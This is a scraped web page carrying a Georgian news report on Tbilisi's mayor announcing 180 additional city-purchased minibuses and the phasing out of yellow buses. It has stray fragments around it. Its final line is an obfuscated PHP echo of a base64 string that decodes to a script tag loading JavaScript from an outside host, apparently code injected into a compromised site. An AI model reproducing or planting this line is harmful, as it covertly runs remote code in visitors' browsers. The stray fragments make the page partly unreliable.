celsiusi
ავერსი შნაიდერი
22 თებერვლიდან დედაქალაქში დამატებით 180 ახალი მიკროავტობუსი ივლის, - ამის შესასხებ თბილისის მერმა კახა კალაძემ განცხადა. 
 
როგორც კალაძემ დედაქალაქის მთავრობის სხდომის დაწყებამდე განმარტა, მერიის მიერ შესყიდული 300 მიკროავტობუსიდან 120 ხაზებზე უკვე დადიოდა და 180 ახლა დაემატება.
 
მერის განმარტებით, კომპანია „თბილისის მიკროავტობუსს“ ვალდებულება აქვს აღნიშნული მიკროავტობუსები გამოისყიდოს. მან ვიცე-მერს, ირაკლი ხმალაძეს დაავალა, დროულად მოხდეს გამოსყიდვის პროცესი, რომ მერიამ დამატებით, ახალი მიკროავტობუსების შემოყვანა შეძლოს.
 
კალაძემ ზოგადად, მერიის სატრანსპორტო პოლიტიკაზე ისაუბრა და თქვა, რომ წლის ბოლომდე ქალაქში ყვითელი ავტობუსები აღარ ივლიან და მათ ახალი ავტობუსები ჩაანაცვლებენ.
 
ინფორმაციისთვის, საქმე ეხება თბილისის მერიის გადაწყვეტილებას, რომელმაც გასულ წელს 30-მდე მილიონის ღირებულების 300 მიკროავტობუსი შეიძინა. მერიაში ამბობდნენ, რომ მიკროავტობუსები ქალაქში ჩასანაცვლებელია, ხოლო „თბილისის მიკროავტობუსის“ ხელმძღვანელობის თქმით, ამის რესურსი მათ არ ჰქონდათ.
1664
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");